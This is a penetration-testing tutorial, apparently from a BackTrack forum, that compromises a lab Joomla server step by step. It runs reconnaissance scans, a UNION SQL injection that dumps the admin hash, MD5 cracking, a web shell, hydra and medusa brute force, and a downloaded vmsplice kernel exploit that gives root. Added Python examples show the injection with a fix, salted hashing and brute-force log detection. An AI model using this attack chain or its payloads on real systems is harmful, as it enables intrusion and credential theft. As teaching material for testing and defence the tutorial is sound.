Testing a server's security

    We will begin by using a few tools to collect information about the server we are targeting:



    - httprint
    - DMitry http://wiki.backtrack-fr.net/index.php/DMitry
    - nmap http://wiki.backtrack-fr.net/index.php/Nmap
    - amap http://wiki.backtrack-fr.net/index.php/Amap

    Code:

    bt linux # httprint -h 192.168.1.44 -s signatures.txt
    httprint v0.301 (beta) - web server fingerprinting tool
    (c) 2003-2005 net-square solutions pvt. ltd. - see readme.txt
    http://net-square.com/httprint/
    [email protected]
    
    Finger Printing on http://192.168.1.44:80/
    Finger Printing Completed on http://192.168.1.44:80/
    --------------------------------------------------
    Host: 192.168.1.44
    Derived Signature:
    Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8
    811C9DC568D17AAE811C9DC5811C9DC5811C9DC5505FCFE84276E4BB630A04DB
    0D7645B5811C9DC5811C9DC5CD37187C811C9DC5811C9DC5811C9DC5811C9DC5
    68D17AAE68D17AAE68D17AAE811C9DC5E2CE6927050C5D3368D17AAE9E431BC8
    6ED3C29568D17AAE2A200B4C68D17AAE68D17AAE68D17AAE68D17AAEE2CE6923
    E2CE692368D17AAE811C9DC5E2CE6927E2CE6923
    
    Banner Reported: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8
    Banner Deduced: Lotus-Domino/6.x
    Score: 92
    Confidence: 55.42
    ------------------------

    Code:

    bt ~ # dmitry -p -b 192.168.1.44
    Deepmagic Information Gathering Tool
    "There be some deep magic going on"
    
    HostIP:192.168.1.44
    HostName:joomla12
    
    Gathered TCP Port information for 192.168.1.44
    ---------------------------------
    
    Port State
    21/tcp open
    >> 220 Welc0m3 To The SUp3r S3cuRe's Ftp S3rVer
    22/tcp open
    >> SSH-2.0-OpenSSH_4.3p2 Debian-9
    80/tcp open
    .....

    Code:

    bt bin # amap -bvq 192.168.1.44 80
    Using trigger file /usr/local/etc/appdefs.trig ... loaded 30 triggers
    Using response file /usr/local/etc/appdefs.resp ... loaded 346 responses
    Using trigger file /usr/local/etc/appdefs.rpc ... loaded 450 triggers
    
    amap v5.2 (www.thc.org/thc-amap) started at 2008-09-15 17:35:02 - MAPPING mode
    
    Total amount of tasks to perform in plain connect mode: 23
    Waiting for timeout on 23 connections ...
    Protocol on 192.168.1.44:80/tcp (by trigger http) matches http - banner: HTTP/1.1 302 Found\r\nDate: Mon, 15 Sep 2008 17:28:21 GMT\r\nServer: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8\r\nLocation: http://127.0.1.1/apache2-default/\r\nContent-Length: 368\r\nConnection: close\r\n
    ....
    amap v5.2 finished at 2008-09-15 17:35:11

    Code:

    bt ~ # nmap -sSV -P0 192.168.1.44
    
    Starting Nmap 4.50 ( http://insecure.org ) at 2008-09-15 17:44 CEST
    Interesting ports on joomla12 (192.168.1.44):
    Not shown: 1706 closed ports
    PORT STATE SERVICE VERSION
    21/tcp open ftp vsftpd or WU-FTPD
    22/tcp open ssh OpenSSH 4.3p2 Debian 9 (protocol 2.0)
    80/tcp open http Apache httpd 2.2.3 ((Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8)
    111/tcp open rpcbind 2 (rpc #100000)
    113/tcp open ident OpenBSD identd
    MAC Address: 00:02:A5:23:CE:94 (Compaq Computer)
    Service Info: OSs: Linux, OpenBSD

    Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 6.378 seconds

    From this information gathering we see an Apache 2.2.3 web server on a Debian etch machine, an FTP service (vsftpd or WU-FTPD) and an OpenSSH 4.3p2 SSH service. Note that httprint deduced Lotus-Domino with a confidence of only 55, contradicting the banner it read: banners can be altered and fingerprints can be wrong, so cross-check with several tools (here dmitry, amap and nmap all agree on Apache 2.2.3) before trusting a version.

    We will now test the website running on this machine with nikto.

    - nikto http://wiki.backtrack-fr.net/index.php/Nikto
    Code:

    bt nikto # ./nikto.pl -e 1 -host http://192.168.1.44/joomla12 -F txt -o nickojoom.txt
    ---------------------------------------------------------------------------
    - Nikto 2.01/2.01 - cirt.net
    + Target IP: 192.168.1.44
    + Target Hostname: joomla12
    + Target Port: 80
    + Using IDS Evasion: Random URI encoding (non-UTF8)
    + Start Time: 2008-09-16 10:26:17
    ---------------------------------------------------------------------------
    + Server: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    - Root page / redirects to: http://joomla12/apache2-default/
    - Retrieved X-Powered-By header: PHP/5.2.0-8+etch10
    + /robots.txt - contains 13 'disallow' entries which should be manually viewed (added to mutation file lists) (GET).
    + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
    + OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does not mean it is vulnerable to XST.
    + PHP/5.2.0-8+etch10 appears to be outdated (current is at least 5.2.4)
    + Apache/2.2.3 appears to be outdated (current is at least Apache/2.2.6). Apache 1.3.39 and 2.0.61 are also current.
    + mod_python/3.2.10 appears to be outdated (current is at least 3.3.1)
    + PHP/5.2.0-8+etch10 appears to be outdated (current is at least 5.2.4)
    + mod_perl/2.0.2 appears to be outdated (current is at least 5.8.0)
    + OSVDB-0: GET /joomla12/help/ : Help directory should not be accessible
    + OSVDB-0: GET /joomla12/index.php?module=My_eGallery : My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.
    + OSVDB-8193: GET /joomla12/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc : EW FileManager for PostNuke allows arbitrary file retrieval.
    + OSVDB-12184: GET /joomla12/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 : PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.
    + OSVDB-3092: GET /joomla12/administrator/ : This might be interesting...
    + OSVDB-3092: GET /joomla12/includes/ : This might be interesting...
    + OSVDB-3093: GET /joomla12/index.php?base=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
    + OSVDB-3093: GET /joomla12/index.php?IDAdmin=test : This might be interesting... has been seen in web logs from an unknown scanner.
    + OSVDB-3093: GET /joomla12/index.php?pymembs=admin : This might be interesting... has been seen in web logs from an unknown scanner.
    + OSVDB-3093: GET /joomla12/index.php?SqlQuery=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
    + OSVDB-3093: GET /joomla12/index.php?tampon=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
    + OSVDB-3093: GET /joomla12/index.php?topic=<script>alert(document
    + OSVDB-3761: GET /joomla12/?pattern=/etc/*&sort=name : The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl.
    + 2963 items checked: 22 item(s) reported on remote host
    + End Time: 2008-09-16 10:27:08 (51 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested

    The report tells us there may be vulnerabilities; it is up to us to test them and find out :P Keep in mind that most of these hits are generic signature matches (PostNuke, TCLHttpd, My_eGallery) that do not necessarily apply to a Joomla install, so each one has to be confirmed by hand.
    Code:

    + OSVDB-0: GET /joomla12/index.php?module=My_eGallery : My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.

    Let's start with that one. Browsing the site we find the name of the Joomla gallery component actually installed, which is MyAlbum
    (hxxp://192.168.1.44/joomla12/index.php?option=com_myalbum&Itemid=26)

    A quick search on milw0rm will find an exploit, if one exists.

    Code:

    bt Desktop # ./milwormsearch.sh Joomla myalbum
    ************************************************
    * Explorateur d'exploit sur Milw0rm *
    * by s3th *
    ************************************************

    exploit: Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability
    Link : http://www.milw0rm.com/exploits/5318
    Do you want to display the exploit in Firefox (F), on screen (E), or quit (Q):
    e
    <html><head><title>Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability</title></head><pre>-------------------------------------------------------------------------------------------------
    # Title : Joomla Component MyAlbum SQL Injection Vulnerability
    # Author : parad0x
    # D.Page : http://joomlacode.org/gf/project/myalbum/
    -------------------------------------------------------------------------------------------------
    http://[target]/index.php?option=com_myalbum&amp;album=[SQL]

    -------------------------------------------------------------------------------------------------
    Example:

    http://www.akparti.org.tr/disiliskil...%20jos_users/*


    -------------------------------------------------------------------------------------------------
    greetz : VoLqaN
    -------------------------------------------------------------------------------------------------
    http://inso.spam-site.www

    # milw0rm.com [2008-03-28]</pre></html>

    We will now test this injection on our site. The payload replaces the album id with -1 (so the legitimate query returns nothing) and UNION SELECTs the username and password from jos_users into the page; the five values match the column count of the original SELECT, char(32) is a space, and /* comments out the rest of the original query: -1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*

    Code:

    http://192.168.1.44/joomla12/index.p...%20jos_users/*

    and discover the admin password, which is an unsalted MD5 hash:

    admin e10adc3949ba59abbe56e057f20f883e
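
The mechanics of that album=[SQL] injection, as an added example that is not code from the original post or from Joomla/MyAlbum: a constructed SQLite fixture stands in for the Joomla database (the jos_myalbum_albums table and its columns are assumptions; only jos_users and the admin hash come from the page), the vulnerable handler pastes the parameter into the SQL text exactly as the component did, and the hardened handler beside it binds the value as a parameter. MySQL's concat(username,char(32),password) is written as username||' '||password because SQLite has no concat().

```python
import sqlite3

# Constructed fixture. The admin hash is the one recovered on the page
# (unsalted MD5 of "123456"); the album table is invented for this demo.
SCHEMA = """
CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT);
INSERT INTO jos_users VALUES (62, 'admin', 'e10adc3949ba59abbe56e057f20f883e');
CREATE TABLE jos_myalbum_albums (id INTEGER, title TEXT, owner INTEGER,
                                 hidden INTEGER, sortorder INTEGER);
INSERT INTO jos_myalbum_albums VALUES (1, 'Holidays', 62, 0, 1);
"""

# The page's payload adapted to SQLite: -1 so the real query matches nothing,
# five columns to line up with the original SELECT, /* to swallow its tail.
PAYLOAD = "-1 union select 0,username||' '||password,2,3,4 from jos_users/*"


def connect():
    """In-memory database loaded with the constructed fixture."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def album_vulnerable(db, album):
    """Mirrors the bug: the album GET parameter is concatenated into the SQL,
    so the attacker controls the statement and the trailing AND is commented out."""
    sql = ("SELECT id,title,owner,hidden,sortorder FROM jos_myalbum_albums "
           "WHERE id=" + album + " AND hidden=0")
    return db.execute(sql).fetchall()


def album_fixed(db, album):
    """Hardened form: validate the type, then bind the value as a parameter.
    Whatever the string contains, it can only ever be compared as data."""
    try:
        album_id = int(album)
    except ValueError:
        return []                       # reject anything that is not an id
    sql = ("SELECT id,title,owner,hidden,sortorder FROM jos_myalbum_albums "
           "WHERE id=? AND hidden=0")
    return db.execute(sql, (album_id,)).fetchall()


if __name__ == "__main__":
    db = connect()
    print("vulnerable:", album_vulnerable(db, PAYLOAD))   # leaks the admin hash
    print("fixed     :", album_fixed(db, PAYLOAD))        # nothing
```

Run it and the vulnerable handler returns a row whose title column reads "admin e10adc3949ba59abbe56e057f20f883e", which is exactly what appeared in the gallery page; the fixed handler returns nothing for the payload and the right album for a real id.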

    Let's see why it matters to choose a good password: if it is too weak it will be cracked by a tool such as John the Ripper, or it will already be in an online cracking database.

    - John the Ripper http://wiki.backtrack-fr.net/index.php/John_The_Ripper

    Code:

    bt Desktop # ./md5crack.sh e10adc3949ba59abbe56e057f20f883e
    ************************************************
    * MD5crack online *
    * by s3th *
    ************************************************

    Plain text: 123456
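
What the online lookup above (and John the Ripper) actually does with an unsalted MD5, and why a salted, iterated hash of the very same password defeats the lookup. This is an added example, not the md5crack.sh script from the post; the wordlist is a constructed stand-in for the dictionary used on the page, and the pbkdf2_sha256$rounds$salt$hash storage format is an assumption for the demo.

```python
import hashlib
import hmac
import os

ADMIN_HASH = "e10adc3949ba59abbe56e057f20f883e"   # from the page: unsalted MD5
# Constructed toy wordlist; a real run would use the same dictionary as hydra.
WORDLIST = ["password", "1234", "qwerty", "123456", "letmein", "admin"]


def crack_md5(target_hex, words):
    """Dictionary attack on an unsalted MD5: one cheap hash per guess, and the
    table of (word, hash) pairs can be precomputed once and shared, which is
    all an online 'MD5 crack' database is."""
    for word in words:
        if hashlib.md5(word.encode()).hexdigest() == target_hex:
            return word
    return None


def pbkdf2_store(password, salt=None, rounds=100_000):
    """Salted, iterated storage (PBKDF2-HMAC-SHA256). A fresh random salt per
    user means two users with password 123456 get unrelated hashes."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return f"pbkdf2_sha256${rounds}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(stored, candidate):
    """Recompute with the stored salt and rounds; constant-time compare."""
    algo, rounds, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                             bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)


def crack_pbkdf2(stored, words):
    """The same dictionary attack still works in principle against a weak
    password, but every guess now costs `rounds` HMAC calls and nothing can
    be precomputed across users, so a 30 000-word dictionary is no longer
    a seven-second job and a lookup table is useless."""
    for word in words:
        if pbkdf2_verify(stored, word):
            return word
    return None


if __name__ == "__main__":
    print("md5 cracked:", crack_md5(ADMIN_HASH, WORDLIST))
    stored = pbkdf2_store("123456")
    print("stored     :", stored)
    print("pbkdf2 crack:", crack_pbkdf2(stored, WORDLIST))
```

The salt only stops the lookup; the rounds are what make each guess expensive. A weak password such as 123456 still falls to a dictionary either way, which is the real lesson of the post.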

    Now that we can log in as admin on the site, all that's left is to upload a script that lets us run shell commands, or a backdoor, and look for interesting information on the server. The commands below are run through that web shell:

    cat /etc/passwd

    Code:

    s3th:x:1000:1000:s3th,,,:/home/s3th:/bin/bash
    mysql:x:109:114:MySQL Server,,,:/var/lib/mysql:/bin/false
    ftp:x:110:65534::/home/ftp:/bin/false
    ftpuser:x:1001:1001::/home/ftpuser:/bin/bash
    sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
    snort:x:112:115:Snort IDS:/var/log/snort:/bin/false

    uname -a

    Code:

    Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux

    Now that we know of a user "s3th", we can attack the FTP or SSH service with:

    - hydra http://wiki.backtrack-fr.net/index.php/Hydra/Hydra-gtk
    - medusa

    Code:

    bt Desktop # hydra -l s3th -P ../arbeit/dict 192.168.1.44 ftp
    Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
    Hydra (http://www.thc.org) starting at 2008-09-17 11:21:39
    [DATA] 16 tasks, 1 servers, 30206 login tries (l:1/p:30206), ~1887 tries per task
    [DATA] attacking service ftp on port 21
    [21][ftp] host: 192.168.1.44 login: s3th password: 123456
    [STATUS] attack finished for 192.168.1.44 (waiting for childs to finish)
    [21][ftp] host: 192.168.1.44 login: s3th password: 123456
    Hydra (http://www.thc.org) finished at 2008-09-17 11:21:46

    Code:

    bt Desktop # medusa -h 192.168.1.44 -u s3th -P ../arbeit/dict -M ssh
    Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>
    
    ACCOUNT CHECK: [ssh] Host: 192.168.1.44 (1/1) User: s3th (1/1) Password: 1234 (1/30206)
    ACCOUNT CHECK: [ssh] Host: 192.168.1.44 (1/1) User: s3th (1/1) Password: 123456 (2/30206)
    ACCOUNT FOUND: [ssh] Host: 192.168.1.44 User: s3th Password: 123456 [SUCCESS]
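
What those hydra and medusa runs look like from the defender's side, as an added example that is not part of the original post: a sliding-window detector over the target's auth log. The log lines are constructed in Debian auth.log format for sshd (vsftpd logs differently and is not handled here), and the year, threshold and window are assumptions chosen for the demo. It raises one alert when a source reaches the failure threshold and a second when a login succeeds while the burst is still in the window, which is the moment the password list contained the right entry.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample: a burst of failures from 192.168.1.39 followed by a
# success (the hydra/medusa pattern), then a lone failure and a normal login
# from another host that must not be flagged.
SAMPLE_LOG = """\
Sep 17 11:21:39 debian sshd[4101]: Failed password for s3th from 192.168.1.39 port 41022 ssh2
Sep 17 11:21:39 debian sshd[4103]: Failed password for s3th from 192.168.1.39 port 41023 ssh2
Sep 17 11:21:40 debian sshd[4105]: Failed password for s3th from 192.168.1.39 port 41024 ssh2
Sep 17 11:21:40 debian sshd[4107]: Failed password for s3th from 192.168.1.39 port 41025 ssh2
Sep 17 11:21:41 debian sshd[4109]: Failed password for s3th from 192.168.1.39 port 41026 ssh2
Sep 17 11:21:41 debian sshd[4111]: Accepted password for s3th from 192.168.1.39 port 41027 ssh2
Sep 17 11:30:02 debian sshd[4200]: Failed password for s3th from 192.168.1.50 port 50001 ssh2
Sep 17 11:45:10 debian sshd[4300]: Accepted password for s3th from 192.168.1.50 port 50002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse(line, year=2008):
    """Return (timestamp, result, user, ip) for an sshd password line, else
    None. syslog omits the year, so one is assumed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
    return ts, m["result"], m["user"], m["ip"]


def detect(lines, threshold=5, window_s=60):
    """Count failures per source IP inside a sliding window. Emits one
    'brute-force' alert when an IP reaches `threshold` failures within
    `window_s` seconds, and a 'success-after-burst' alert when a login
    succeeds while the window is still hot."""
    failures = defaultdict(deque)
    flagged = set()
    alerts = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, result, user, ip = rec
        window = failures[ip]
        while window and (ts - window[0]).total_seconds() > window_s:
            window.popleft()               # forget failures outside the window
        when = ts.strftime("%b %d %H:%M:%S")
        if result == "Failed":
            window.append(ts)
            if len(window) >= threshold and ip not in flagged:
                flagged.add(ip)            # one alert per source, not per line
                alerts.append(("brute-force", ip, user, when))
        elif len(window) >= threshold:
            alerts.append(("success-after-burst", ip, user, when))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(*alert)
```

Against the sample it fires twice for 192.168.1.39 at 11:21:41 and stays silent for 192.168.1.50, whose single failure is fifteen minutes before its login. The post's own closing remark that everything is logged on the machine is exactly why this works.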
    
    Now that we have an SSH account and password (the same weak password the web admin used), all that's left is to log in:
    Code:
    
    bt ~ # ssh s3th@192.168.1.44
    s3th@192.168.1.44's password:
    Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686
    
    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    You have new mail.
    Last login: Mon Sep 15 11:28:45 2008

    There we are; all that's left is to find a little sploit. The uname output gave us a 2.6.18 kernel built in March 2007, which predates the February 2008 fix for the vmsplice local root bug (CVE-2008-0010), so that exploit is the natural candidate.

    Code:

    s3th@debian:~$ whoami
    s3th
    s3th@debian:~$ cd /tmp/
    s3th@debian:/tmp$ wget 192.168.1.39/vmsplice-local-root-exploit.c
    --13:21:50-- http://192.168.1.39/vmsplice-local-root-exploit.c
    => `vmsplice-local-root-exploit.c'
    Connecting to 192.168.1.39:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 6,293 (6.1K) [text/x-c]
    
    100%[=============================================================================================>] 6,293 --.--K/s
    
    13:22:42 (198.77 KB/s) - `vmsplice-local-root-exploit.c' saved [6293/6293]
    
    s3th@debian:/tmp$ gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c
    s3th@debian:/tmp$ ./vmsplice-local-root-exploit
    -----------------------------------
    Linux vmsplice Local Root Exploit
    By qaaz
    -----------------------------------
    [+] mmap: 0x0 .. 0x1000
    [+] page: 0x0
    [+] page: 0x20
    [+] mmap: 0x4000 .. 0x5000
    [+] page: 0x4000
    [+] page: 0x4020
    [+] mmap: 0x1000 .. 0x2000
    [+] page: 0x1000
    [+] mmap: 0xb7e32000 .. 0xb7e64000
    [+] root
    root@debian:/tmp# whoami
    root

    This tutorial is only meant to show that a badly configured system is vulnerable.
    Do not try these techniques on machines you do not own.
    Everything you do will be logged on the machine.

    src: bt-fr.net
    mactux †|

    Knowledge is only real if it is shared

    #2
    Very good tutorial, thank you.
